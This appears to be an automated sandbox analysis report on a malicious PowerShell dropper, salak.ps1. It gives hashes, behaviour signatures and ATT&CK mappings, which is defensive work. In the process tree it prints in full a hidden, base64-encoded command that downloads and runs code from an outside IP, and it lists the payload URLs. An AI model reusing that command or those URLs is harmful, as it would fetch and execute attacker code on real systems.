8de9581d99d64252080d4a00bb75660b3d95bd05772556a0f1cb21bb68afa166

Analysis

max time kernel
72s
max time network
19s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
03/09/2024, 10:06

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

salak.ps1
Size

1KB
MD5

74516d65d42a0909715cac0691afd1aa
SHA1

58201f8a6569897cf9433fcaef4454e7b1a3d226
SHA256

8de9581d99d64252080d4a00bb75660b3d95bd05772556a0f1cb21bb68afa166
SHA512

65fd8d5863784a9057202ac3813f688a36d9674f7f07983fc7fc87fba7ac8369cec99c59e0ddd63a0ccea0436f18649e08f0d3a329788c858f08f7149c9631ad

Score

10^/10

execution

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://207.154.255.134:8443/ZIen7RH/1zFNrVrn0

ps1.dropper

http://207.154.255.134:8443/ZIen7RH

Signatures

Blocklisted process makes network request 2 IoCs

flow	pid	Process
2	2940	powershell.exe
3	2940	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2940	powershell.exe
584	powershell.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
584	powershell.exe
2940	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	584	powershell.exe
Token: SeDebugPrivilege	2940	powershell.exe

Suspicious use of WriteProcessMemory 3 IoCs

description	pid	Process	procid_target
PID 584 wrote to memory of 2940	584	powershell.exe	31
PID 584 wrote to memory of 2940	584	powershell.exe	31
PID 584 wrote to memory of 2940	584	powershell.exe	31

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\salak.ps1
1⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:584
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w hidden -e WwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbAA9AFsATgBlAHQALgBTAGUAYwB1AHIAaQB0AHkAUAByAG8AdABvAGMAbwBsAFQAeQBwAGUAXQA6ADoAVABsAHMAMQAyADsAJABsAE4AbwBpAD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAOwBpAGYAKABbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBQAHIAbwB4AHkAXQA6ADoARwBlAHQARABlAGYAYQB1AGwAdABQAHIAbwB4AHkAKAApAC4AYQBkAGQAcgBlAHMAcwAgAC0AbgBlACAAJABuAHUAbABsACkAewAkAGwATgBvAGkALgBwAHIAbwB4AHkAPQBbAE4AZQB0AC4AVwBlAGIAUgBlAHEAdQBlAHMAdABdADoAOgBHAGUAdABTAHkAcwB0AGUAbQBXAGUAYgBQAHIAbwB4AHkAKAApADsAJABsAE4AbwBpAC4AUAByAG8AeAB5AC4AQwByAGUAZABlAG4AdABpAGEAbABzAD0AWwBOAGUAdAAuAEMAcgBlAGQAZQBuAHQAaQBhAGwAQwBhAGMAaABlAF0AOgA6AEQAZQBmAGEAdQBsAHQAQwByAGUAZABlAG4AdABpAGEAbABzADsAfQA7AEkARQBYACAAKAAoAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMgAwADcALgAxADUANAAuADIANQA1AC4AMQAzADQAOgA4ADQANAAzAC8AWgBJAGUAbgA3AFIASAAvADEAegBGAE4AcgBWAHIAbgAwACcAKQApADsASQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAyADAANwAuADEANQA0AC4AMgA1ADUALgAxADMANAA6ADgANAA0ADMALwBaAEkAZQBuADcAUgBIACcAKQApADsA
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2940

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
7bb4e5705ff277c6266bda9f18001a1b

SHA1
6a49e76dae1f082c2a6403740c52bc8b7e6397ef

SHA256
a85deb6508e59e8c23644f3a0f14c769914fd6ae43c0a5ced2f40e75a765360e

SHA512
43e6c5e8aea575a9daee88c5e6214d34d6695fc88bf01e3e6c0305dd2267f94f8e60388d7cab0495f6d6df3267717505766f58c6c85bbcdfabf9ac320f7c5d80

Download Submit
memory/584-4-0x000007FEF5A1E000-0x000007FEF5A1F000-memory.dmp

Filesize
4KB

Download
memory/584-5-0x000000001B2F0000-0x000000001B5D2000-memory.dmp

Filesize
2.9MB

Download
memory/584-6-0x0000000002530000-0x0000000002538000-memory.dmp

Filesize
32KB

Download
memory/584-7-0x000007FEF5760000-0x000007FEF60FD000-memory.dmp

Filesize
9.6MB

Download
memory/584-8-0x000007FEF5760000-0x000007FEF60FD000-memory.dmp

Filesize
9.6MB

Download
memory/584-9-0x000007FEF5760000-0x000007FEF60FD000-memory.dmp

Filesize
9.6MB

Download
memory/584-15-0x000007FEF5760000-0x000007FEF60FD000-memory.dmp

Filesize
9.6MB

Download
memory/584-18-0x000007FEF5760000-0x000007FEF60FD000-memory.dmp

Filesize
9.6MB

Download
memory/2940-16-0x000007FEF5760000-0x000007FEF60FD000-memory.dmp

Filesize
9.6MB

Download
memory/2940-17-0x000007FEF5760000-0x000007FEF60FD000-memory.dmp

Filesize
9.6MB

Download